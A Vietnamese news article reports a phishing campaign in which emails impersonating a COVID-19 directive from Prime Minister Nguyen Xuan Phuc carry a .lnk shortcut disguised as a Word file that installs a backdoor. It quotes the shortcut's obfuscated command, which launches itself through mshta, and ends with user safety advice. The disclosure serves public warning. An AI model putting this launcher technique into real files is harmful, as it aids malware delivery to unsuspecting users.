Email mạo danh thông báo của Thủ tướng về dịch COVID-19 để phát tán mã độc

Theo dõi Báo Gia Lai trênGoogle News
Mã độc được chèn trong một tệp văn bản với tiêu đề "Chi thi cua Thu tuong Nguyen Xuan Phuc" nhằm đánh lừa người dùng. Mẫu mã độc này mới được thu thập được qua hệ thống CMC Threat Intelligence.
 
Mã độc được phát tán qua email giả dạng thông báo của Thủ tướng Chính phủ về dịch COVID -19
Cụ thể, theo phân tích của Công ty CMC Cyber Security, file mẫu là một file shortcut có phần mở rộng là ".lnk" được ẩn dưới dạng một file Word nhằm đánh lừa người dùng do đuôi ".lnk" sẽ được hệ điều hành Windows ẩn đi.
Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i" .
Các chuyên gia CMC Cyber Security cho biết sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ có thể tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…
"Hiện tượng lợi dụng các nội dung, thông tin nhạy cảm để phát tán mã độc đã, đang diễn ra hằng ngày không chỉ riêng các thông tin về COVID-19 mà còn nhiều thông tin khác. Nếu người dùng không cẩn thận khi click, mở các file chứa mã độc, người dùng có thể bị mất các thông tin cá nhân, ngoài ra các hacker có thể lợi dụng tài khoản lấy được của người dùng để lan truyền tin tức giả, phát tán mã độc", chuyên gia bảo mật cảnh báo.
"Trường hợp bắt buộc phải tải file về nhưng thấy có nghi ngờ về nội dung hoặc người gửi thì người dùng cần chuyển tiếp email đó vào một email tạm thời khác và dùng một máy khác, tách biệt khỏi mạng đang làm việc để mở file. Nếu nắm về kỹ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo)", chuyên giao bảo mật lưu ý thêm.
T.Hà (TTO)

Có thể bạn quan tâm

Những lưu ý khi trải nghiệm mạng 5G

Những lưu ý khi trải nghiệm mạng 5G

Trong tuần qua, nhiều người dân phản ánh điện thoại hiển thị sóng 5G khi đi qua một số khu vực ở các địa phương: Hà Nội, TP Hồ Chí Minh, Hải Phòng, Thái Bình, Nam Định... thường xuyên bị mất sóng và phải đăng ký thử gói cước, sóng 5G mới xuất hiện trở lại.

Tạo đột phá trong chuyển đổi số

Tạo đột phá trong chuyển đổi số

Năm 2024 là năm thứ 3 Ngày Chuyển đổi số quốc gia 10-10 được tổ chức trên toàn quốc, với chủ đề “Phổ cập hạ tầng số và sáng tạo ứng dụng số để phát triển kinh tế số - Động lực mới cho tăng trưởng kinh tế và năng suất lao động”.